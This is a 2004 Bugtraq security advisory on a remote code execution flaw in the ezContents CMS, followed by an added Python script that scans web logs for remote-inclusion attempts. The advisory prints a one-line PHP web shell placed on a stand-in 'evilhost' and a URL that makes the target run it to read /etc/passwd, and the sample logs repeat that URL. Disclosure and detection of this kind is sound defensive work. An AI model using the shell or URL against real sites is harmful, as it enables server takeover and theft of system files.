[33060] in bugtraq
Remote Code Execution in ezContents
daemon@ATHENA.MIT.EDU (Zero_X www.lobnan.de Team)
Mon Jan 12 13:38:33 2004
Date: 10 Jan 2004 17:13:58 -0000
Message-ID: <20040110171358.17989.qmail@www.securityfocus.com>
From: "Zero_X www.lobnan.de Team" <zero-x@linuxmail.org>
To: bugtraq@securityfocus.com
Remote Code Execution in ezContents
"ezContents" from www.ezcontents.org allows remote code execution.
Example:
Create the following file on your webserver:
----index.php----
<?
system($cmd);
?>
-----------------
And then type in the following URL:
http://targethost/module.php?link=http://evilhost/index.php&cmd=cat /etc/passwd
Zero X, member of www.lobnan.de and www.lostkey.org
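
For defenders reviewing web server logs, the following added example (not part of the original advisory) flags requests to module.php whose link parameter carries a remote URL, including percent-encoded and double-encoded forms. The combined access log format, the sample log lines and the function name are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# A value naming a remote resource: "scheme://..." or protocol-relative "//...".
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*:)?//', re.IGNORECASE)

# Constructed sample entries; host names follow the advisory's placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Jan/2004:13:40:01 +0000] "GET /module.php?link=news/index.php HTTP/1.0" 200 5120',
    '192.0.2.66 - - [12/Jan/2004:13:41:17 +0000] "GET /module.php?link=http://evilhost/index.php&cmd=cat%20/etc/passwd HTTP/1.0" 200 1843',
    '192.0.2.66 - - [12/Jan/2004:13:41:30 +0000] "GET /module.php?link=http%253A%252F%252Fevilhost%252Findex.php HTTP/1.0" 200 1843',
    '192.0.2.10 - - [12/Jan/2004:13:42:02 +0000] "GET /index.php?link=http://example.org/ HTTP/1.0" 200 900',
]

def remote_include_attempts(lines, script="module.php", param="link"):
    """Return (line_number, decoded_value) for requests whose `param` is a URL."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line we understand
        target = urlsplit(match.group("target"))
        if not target.path.lower().endswith("/" + script):
            continue  # a different script; out of scope for this check
        for key, value in parse_qsl(target.query, keep_blank_values=True):
            # parse_qsl decodes once; decode again to catch double encoding.
            decoded = unquote(value)
            if key == param and REMOTE_RE.match(decoded):
                hits.append((number, decoded))
    return hits

if __name__ == "__main__":
    for number, value in remote_include_attempts(SAMPLE_LOG):
        print(f"line {number}: {value}")
```

A hit records an attempt only; whether the request succeeded has to be confirmed from the response and from the web host's outbound connections.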